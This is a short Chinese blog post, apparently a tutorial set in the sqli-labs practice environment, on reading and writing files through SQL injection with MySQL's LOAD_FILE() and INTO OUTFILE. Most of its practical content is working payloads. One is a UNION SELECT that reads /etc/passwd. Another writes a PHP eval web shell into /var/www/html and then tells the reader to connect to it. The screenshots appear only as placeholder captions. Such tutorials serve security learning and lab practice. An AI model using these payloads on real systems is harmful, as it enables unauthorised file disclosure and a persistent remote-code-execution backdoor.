Sql注入文件读写操作

慎壹

关注

阅读 74

2022-05-05

1.文件读取函数load_file()
LOAD_FILE()函数读取一个文件并将其内容作为字符串返回
LOAD_FILE(file_name);             LOAD_FILE(/etc/passwd);
其中file_name是文件的完整路径	

2.写入函数为into outfile()
INTO OUTFILE()函数将自定义字符串写入指定文件中 (前提权限允许写入)

SELECTINTO OUTFILE ‘file_name’  SELECTINTO OUTFILE/tmp/111

load_file读取文件

Union select 1,load_file("/etc/passwd")--+

在这里插入图片描述

写入木马文件

Union select 1,"<?php @eval($_POST[x])?>",1 into outfile '/var/www/html/Less-1/1.php'--+

在这里插入图片描述
进行连接即可 但是需要网站文件夹有写的权限 如果没有就会提示
在这里插入图片描述

精彩评论(0)

0 0 举报